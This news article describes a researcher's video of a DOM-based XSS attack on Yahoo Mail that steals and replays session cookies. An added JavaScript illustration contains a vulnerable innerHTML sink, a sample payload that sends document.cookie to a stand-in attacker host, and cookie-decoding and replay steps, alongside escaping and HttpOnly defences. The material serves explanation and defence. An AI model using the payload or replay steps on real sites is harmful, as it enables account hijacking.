A cross-site scripting (XSS) proof-of-concept exploit potentially puts 400 million Yahoo Mail users at risk of having their accounts taken over, one security researcher said.
In a video posted on YouTube, Shahin Ramezany showed an exploit for what he said is a document object model-based cross-site scripting vulnerability that affects Yahoo Mail users on all current browsers.
Using a maliciously crafted link, a pen-testing platform, a Chrome browser add-on, and a touch of social engineering, Ramezany takes complete control of a dummy Yahoo Mail account in less than five minutes.
In the video, Ramezany sends an email with a malicious link embedded in it from one Yahoo Mail account he has open in Chrome to another account that he has set up in a separate Internet Explorer 10 browser. Before switching to IE, Ramezany copies and pastes the malicious URL into his Chrome address bar and gets a ‘404 Not Found’ message. He then switches over to IE, opens the email, and clicks the link, which in turn opens a new IE window. Ramezany quickly minimizes the new window, so it is impossible to say for certain what happens there.
He then goes back to Chrome and enters the malicious link into the address bar there again. This time, instead of a 404 page, Ramezany gets several lines of URL-encoded cookie text, which he copies and decodes in the penetration-testing platform Burp Suite. The change from a 404 to cookie text is the tell: the script injected through the link ran in the victim's browser and sent that session's cookies to the attacker-controlled URL.
Finally, he takes part of the decoded cookie text and plugs it into the “edit this cookie” Chrome browser add-on, refreshes the page, and, just like that, is logged in from Chrome to the Yahoo account to which he sent the malicious email in the first place: the stolen session cookie stands in for the victim's password.
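The three stages the video walks through (a DOM-based XSS sink, the victim's cookies arriving URL-encoded at an attacker endpoint, and replay of those cookies) in their most generic form, as an added illustration for this article. This is not Yahoo's code and not Ramezany's proof-of-concept; the article does not say which Yahoo Mail sink was involved, so the `msg` fragment parameter, the hostnames and the cookie names below are invented. It runs under Node.js with no dependencies and also shows the server-side check a defender would want, since a session cookie issued without HttpOnly is exactly what `document.cookie` hands to injected script.

```javascript
// Added illustration, not Yahoo's code and not the researcher's PoC.
// Hostnames, the "msg" parameter and the cookie names are made up.

// Stage 1a, the vulnerable pattern: the page reads a parameter out of
// location.hash and writes it to the document as HTML (innerHTML). The
// fragment never leaves the browser, so server-side filtering and logging
// never see the payload; that is what makes the bug DOM-based.
function renderMessageVulnerable(pageUrl) {
  const hash = new URL(pageUrl).hash;                // "#msg=%3Cimg..."
  const params = new URLSearchParams(hash.slice(1)); // drop the "#"
  const msg = params.get('msg') || '';
  // Models: container.innerHTML = '<div class="msg">' + msg + '</div>';
  return '<div class="msg">' + msg + '</div>';
}

// Stage 1b, the hardened pattern: escape before the string becomes markup
// (in a real page, assign with textContent instead of innerHTML).
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}
function renderMessageHardened(pageUrl) {
  const hash = new URL(pageUrl).hash;
  const params = new URLSearchParams(hash.slice(1));
  const msg = params.get('msg') || '';
  return '<div class="msg">' + escapeHtml(msg) + '</div>';
}

// Stage 2, what lands on the attacker's endpoint: a payload typically sends
// encodeURIComponent(document.cookie) in a query string. Decoding it and
// splitting it back into name/value pairs is the step the video performs
// in Burp Suite. Cookie values may themselves contain "=", so split on the
// first "=" only.
function decodeStolenCookieBlob(blob) {
  const cookies = {};
  for (const part of decodeURIComponent(blob).split(/;\s*/)) {
    const eq = part.indexOf('=');
    if (eq <= 0) continue;
    cookies[part.slice(0, eq)] = part.slice(eq + 1);
  }
  return cookies;
}

// Stage 3, replay: the "edit this cookie" step amounts to presenting the
// stolen pairs as a Cookie header. The server cannot tell the attacker's
// browser from the victim's; no password is involved.
function buildReplayCookieHeader(cookies) {
  return Object.entries(cookies).map(([k, v]) => k + '=' + v).join('; ');
}

// Defender's check: a session cookie issued without HttpOnly is readable via
// document.cookie, so any script injection can lift it. Given the Set-Cookie
// headers of a login response and the names of the session cookies, return
// the session cookies that lack the flag.
function sessionCookiesMissingHttpOnly(setCookieHeaders, sessionNames) {
  const missing = [];
  for (const header of setCookieHeaders) {
    const attrs = header.split(/;\s*/);
    const name = attrs[0].split('=')[0];
    if (!sessionNames.includes(name)) continue;
    const flags = attrs.slice(1).map((a) => a.toLowerCase());
    if (!flags.includes('httponly')) missing.push(name);
  }
  return missing;
}

// Constructed sample data, not taken from the video.
const PAYLOAD =
  '<img src=x onerror="new Image().src=\'https://attacker.invalid/c?d=\'' +
  '+encodeURIComponent(document.cookie)">';
const VICTIM_URL = 'https://mail.example.test/inbox#msg=' + encodeURIComponent(PAYLOAD);
const SAMPLE_DOCUMENT_COOKIE = 'sess=v=1&n=abc; theme=dark';
const EXFIL_BLOB = encodeURIComponent(SAMPLE_DOCUMENT_COOKIE);
const SAMPLE_SET_COOKIE = [
  'sess=v=1&n=abc; Path=/; Secure',
  'theme=dark; Path=/',
  'xsrf=9f8e; Path=/; HttpOnly; Secure',
];

console.log(renderMessageVulnerable(VICTIM_URL)); // payload survives intact
console.log(renderMessageHardened(VICTIM_URL));   // payload becomes inert text
const stolen = decodeStolenCookieBlob(EXFIL_BLOB);
console.log(buildReplayCookieHeader(stolen));
console.log(sessionCookiesMissingHttpOnly(SAMPLE_SET_COOKIE, ['sess', 'xsrf']));
```

The escaping function fixes the sink, but the HttpOnly check is the mitigation that would have blunted this particular attack chain even with the XSS present: injected script can still act on the victim's behalf inside the page, but it can no longer read the session cookie out of `document.cookie` and hand it to the attacker for replay in another browser.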
Ramezany plans to post the proof-of-concept on his site, Abysssec.com, after Yahoo patches the vulnerability.